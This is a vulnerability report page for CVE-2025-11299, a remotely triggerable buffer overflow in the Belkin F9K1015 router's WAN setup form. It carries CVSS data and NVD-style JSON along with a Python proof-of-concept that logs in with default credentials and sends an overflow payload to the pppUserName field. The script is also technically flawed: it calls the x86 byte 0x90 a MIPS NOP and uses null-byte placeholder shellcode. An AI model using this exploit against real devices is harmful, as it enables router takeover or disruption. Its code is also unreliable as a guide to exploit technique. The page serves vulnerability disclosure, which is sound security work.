Security Vulnerability Report
CVE-2025-11299 CVSS 8.8 HIGH

Published: 2025-10-05 19:16:00
Last Modified: 2025-10-07 17:17:04

Description

A vulnerability was identified in Belkin F9K1015 1.00.10. The affected element is an unknown function of the file /goform/formWanTcpipSetup. The manipulation of the argument pppUserName leads to buffer overflow. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:* - NOT VULNERABLE
Belkin F9K1015 1.00.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11299 PoC - Belkin F9K1015 Buffer Overflow
# Target: /goform/formWanTcpipSetup endpoint
# Parameter: pppUserName
import requests
from pwn import *

TARGET_HOST = "192.168.1.1"  # Default Belkin router IP
TARGET_PORT = 80
AUTH_USER = "admin"
AUTH_PASS = "password"  # Default or obtained credentials


def exploit():
    # Step 1: Authenticate to the router
    session = requests.Session()
    login_url = f"http://{TARGET_HOST}:{TARGET_PORT}/login.asp"
    auth_data = {
        "loginUsername": AUTH_USER,
        "loginPassword": AUTH_PASS
    }
    session.post(login_url, data=auth_data)

    # Step 2: Prepare buffer overflow payload
    # The pppUserName parameter has insufficient bounds checking
    # Overflow the stack buffer to overwrite return address
    overflow_size = 512  # Adjust based on actual buffer size
    junk = b"A" * overflow_size

    # Return address placeholder (MIPS little-endian example)
    # In real exploit, this would point to shellcode or ROP gadget
    ret_address = p32(0x7f010001)

    # NOP sled + shellcode placeholder
    nop_sled = b"\x90" * 32  # MIPS NOP instruction
    shellcode = b"\x00" * 64  # Placeholder for actual shellcode

    payload = junk + ret_address + nop_sled + shellcode

    # Step 3: Send malicious request to vulnerable endpoint
    exploit_url = f"http://{TARGET_HOST}:{TARGET_PORT}/goform/formWanTcpipSetup"
    exploit_data = {
        "pppUserName": payload.decode('latin-1'),
        "pppPassword": "test",
        "wanConnectionType": "PPPoE"
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }

    try:
        response = session.post(exploit_url, data=exploit_data, headers=headers)
        print(f"[*] Exploit sent. Status: {response.status_code}")
        # Check if device crashed or shellcode executed
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed (device may have crashed): {e}")


if __name__ == "__main__":
    exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11299", "sourceIdentifier": "[email protected]", "published": "2025-10-05T19:15:59.730", "lastModified": "2025-10-07T17:17:03.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Belkin F9K1015 1.00.10. The affected element is an unknown function of the file /goform/formWanTcpipSetup. The manipulation of the argument pppUserName leads to buffer overflow. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:belkin:f9k1015_firmware:1.00.10:*:*:*:*:*:*:*", "matchCriteriaId": "3DEB0AFD-4E01-4FD5-8A41-6BD0E2D4DF0B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:belkin:f9k1015:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D273CA6-07A9-43B2-87B3-D0DE1A5B89FA"}]}]}],
"references": [{"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327180", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327180", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661303", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/panda666-888/vuls/blob/main/belkin/f9k1015/formWanTcpipSetup.md#poc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}